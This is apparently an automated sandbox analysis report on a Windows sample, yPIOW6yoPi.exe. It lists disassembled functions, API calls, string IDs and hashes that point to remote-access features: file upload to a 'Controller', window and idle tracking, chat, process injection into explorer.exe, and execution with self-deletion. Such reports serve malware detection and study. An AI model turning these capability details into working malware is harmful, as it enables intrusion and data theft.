                                                  • Opcode ID: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                  • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                  • Opcode Fuzzy Hash: ca681db5516d972aef640dc773a40398a070aaf6ba3dfca6e9b2ec7f30141ac0
                                                  • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                  Function 0044F3E1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                  • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                  • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                  • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                  Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                  • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                  • closesocket.WS2_32(?), ref: 0040481F
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404856
                                                  • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404867
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 0040486E
                                                  • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404880
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404885
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040488A
                                                  • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404895
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040489A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                  • String ID:
                                                  • API String ID: 3658366068-0
                                                  • Opcode ID: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                  • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                  • Opcode Fuzzy Hash: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                  • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48
                                                  Function 020F8056 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 325fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 020F81B3
                                                  • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 020F8229
                                                  • __aulldiv.LIBCMT ref: 020F8250
                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 020F8374
                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 020F838F
                                                  • CloseHandle.KERNEL32(00000000), ref: 020F8467
                                                  • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 020F8481
                                                  • CloseHandle.KERNEL32(00000000), ref: 020F84BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                  • String ID: Uploading file to Controller: $>G
                                                  • API String ID: 1884690901-111729153
                                                  • Opcode ID: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                  • Instruction ID: 813cc19cc932cfaae91a7a6635d79dbd298549f455b6f4c7360dade82b47339a
                                                  • Opcode Fuzzy Hash: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                  • Instruction Fuzzy Hash: 05B1A1716883409FD694FB24C890BEFB7E6AF94310F40891DFA8942690EF749909DF97
                                                  Function 00454982 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                  • GetLastError.KERNEL32 ref: 00454A96
                                                  • __dosmaperr.LIBCMT ref: 00454A9D
                                                  • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                  • GetLastError.KERNEL32 ref: 00454AB3
                                                  • __dosmaperr.LIBCMT ref: 00454ABC
                                                  • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                  • CloseHandle.KERNEL32(?), ref: 00454C26
                                                  • GetLastError.KERNEL32 ref: 00454C58
                                                  • __dosmaperr.LIBCMT ref: 00454C5F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                  • String ID: H
                                                  • API String ID: 4237864984-2852464175
                                                  • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                  • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                  • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                  • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                  Function 0210938F Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 02109394
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 02109452
                                                  • Sleep.KERNEL32(000003E8), ref: 021094D4
                                                  • GetLocalTime.KERNEL32(?), ref: 021094E3
                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 021095CC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$CreateDirectoryH_prologLocalTime
                                                  • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                  • API String ID: 3069631530-65789007
                                                  • Opcode ID: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
                                                  • Instruction ID: 859576e852741ae05360a9cb9d084373eeed00e0442fc4846c4db51702b7a627
                                                  • Opcode Fuzzy Hash: a40dca5e55645720ca30496181093a362b70aa5652279529810e28997b425322
                                                  • Instruction Fuzzy Hash: DB51D472A803589ECF54BBB4CC94AFE77BAAF40300F000029E905A79C6EF645E45EB51
                                                  Function 0040A3F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 0040A456
                                                  • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                  • GetForegroundWindow.USER32 ref: 0040A467
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                  • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                    • Part of subcall function 00409D58: SetEvent.KERNEL32(00000000,?,00000000,0040A91C,00000000), ref: 00409D84
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                  • API String ID: 911427763-3954389425
                                                  • Opcode ID: 53cfb5b2237c6fd0928d653138945363214ed6665f98bbf910386678ddebf1eb
                                                  • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                  • Opcode Fuzzy Hash: 53cfb5b2237c6fd0928d653138945363214ed6665f98bbf910386678ddebf1eb
                                                  • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                  Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 65535$udp
                                                  • API String ID: 0-1267037602
                                                  • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                  • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                  • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                  • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                  Function 02103ECE Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 65535$udp
                                                  • API String ID: 0-1267037602
                                                  • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                  • Instruction ID: 2e1a3db348e843641117c364f401227eb89708bf0a4530a738cb41f0c116e1d2
                                                  • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                  • Instruction Fuzzy Hash: 0B412871288301AFE7249A28D9C4FBB77E8EF85744F04447DFAA5A32D5E7E5C840C662
                                                  Function 00439361 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                  • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                  • __dosmaperr.LIBCMT ref: 004393CD
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                  • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                  • __dosmaperr.LIBCMT ref: 0043940A
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                  • __dosmaperr.LIBCMT ref: 0043945E
                                                  • _free.LIBCMT ref: 0043946A
                                                  • _free.LIBCMT ref: 00439471
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                  • String ID:
                                                  • API String ID: 2441525078-0
                                                  • Opcode ID: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                  • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                  • Opcode Fuzzy Hash: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                  • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                  Function 021295C8 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,020F1D3F,?,00000050,00465290,00000000), ref: 02129620
                                                  • GetLastError.KERNEL32(?,?,020F1D3F,?,00000050,00465290,00000000), ref: 0212962D
                                                  • __dosmaperr.LIBCMT ref: 02129634
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,020F1D3F,?,00000050,00465290,00000000), ref: 02129660
                                                  • GetLastError.KERNEL32(?,?,?,020F1D3F,?,00000050,00465290,00000000), ref: 0212966A
                                                  • __dosmaperr.LIBCMT ref: 02129671
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,00465290,00000000,00000000,?,?,?,?,?,?,020F1D3F,?), ref: 021296B4
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,020F1D3F,?,00000050,00465290,00000000), ref: 021296BE
                                                  • __dosmaperr.LIBCMT ref: 021296C5
                                                  • _free.LIBCMT ref: 021296D1
                                                  • _free.LIBCMT ref: 021296D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                  • String ID:
                                                  • API String ID: 2441525078-0
                                                  • Opcode ID: 7dca9c723f0a3f3e5eee78a7163c4708e0db19878e5bf6bf14be5ff931373868
                                                  • Instruction ID: 41fb4a5ab13b7367798e6c4e3eec0f09e5590613313cfd390e9db70453ea5a9b
                                                  • Opcode Fuzzy Hash: 7dca9c723f0a3f3e5eee78a7163c4708e0db19878e5bf6bf14be5ff931373868
                                                  • Instruction Fuzzy Hash: 6831BF7254429ABFDF126FA8DC44DAE3BBEEF05364F200169F82056250EB31C960DFA1
                                                  Function 021089BB Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$1$2$3$4$5$6$7
                                                  • API String ID: 0-3177665633
                                                  • Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                  • Instruction ID: 1dabe03ecb476999e7dfd44d3e7b5734bbb7e5966a2f1b037bfd88aaf18037c1
                                                  • Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                  • Instruction Fuzzy Hash: 6561DF715CD301AED714EF20D891AEB7BA5BF95310F41880DFA91572E1EB709A08DBA3
                                                  Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                  • TranslateMessage.USER32(?), ref: 00404F30
                                                  • DispatchMessageA.USER32(?), ref: 00404F3B
                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                  • API String ID: 2956720200-749203953
                                                  • Opcode ID: 64aaecef7f8444256305cfeddf957dd1b74104bd130fd80cce60da9c96c87755
                                                  • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                  • Opcode Fuzzy Hash: 64aaecef7f8444256305cfeddf957dd1b74104bd130fd80cce60da9c96c87755
                                                  • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                  Function 020F50B9 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 020F50D8
                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 020F5188
                                                  • TranslateMessage.USER32(?), ref: 020F5197
                                                  • DispatchMessageA.USER32(?), ref: 020F51A2
                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 020F525A
                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 020F5292
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                  • API String ID: 2956720200-749203953
                                                  • Opcode ID: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
                                                  • Instruction ID: 86b75ee8b9c03e0aa669e8a00adac0408b3834a96641a980df9b58814306eb58
                                                  • Opcode Fuzzy Hash: 0622db17b8ffedd3531a9fa1e5e3f576bb625bfe4daf1fd40acc4f0bc4360242
                                                  • Instruction Fuzzy Hash: C041C572684300AFC795FB74DC548AF7BEAAB85710F40052CFA06879A4EF34DA05EB56
                                                  Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                  • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00416EF0
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                  • String ID: <$@$@FG$@FG$Temp
                                                  • API String ID: 1107811701-2245803885
                                                  • Opcode ID: e063231c4d64aecbcfe8c05d05ac103388c964f325b6d9d8871a37430f73297a
                                                  • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                  • Opcode Fuzzy Hash: e063231c4d64aecbcfe8c05d05ac103388c964f325b6d9d8871a37430f73297a
                                                  • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                  Function 0210708E Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 0210718B
                                                  • CloseHandle.KERNEL32(00000000), ref: 02107194
                                                  • DeleteFileA.KERNEL32(00000000), ref: 021071A3
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 02107157
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                  • String ID: <$@$@FG$@FG$TUF
                                                  • API String ID: 1107811701-3315534519
                                                  • Opcode ID: c09cddb986173b223f0ae78b0a5cb3d5da982f6b9b7ae30d07bc44f4aa3a3996
                                                  • Instruction ID: 323cd0a681aedd58ceac20a0df12ff891dcd3439c423cafce39a8a933bf5882e
                                                  • Opcode Fuzzy Hash: c09cddb986173b223f0ae78b0a5cb3d5da982f6b9b7ae30d07bc44f4aa3a3996
                                                  • Instruction Fuzzy Hash: 7B318D31A802099FDB54FBA4DC96AEE7736AF50300F004168EA06664E4EF745E8ADF95
                                                  Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                  • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\yPIOW6yoPi.exe), ref: 00406705
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentProcess
                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                  • API String ID: 2050909247-4145329354
                                                  • Opcode ID: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                  • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                  • Opcode Fuzzy Hash: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                  • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                  Function 00419C85 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                  • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                  • Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                  • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                  Function 00446DCB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
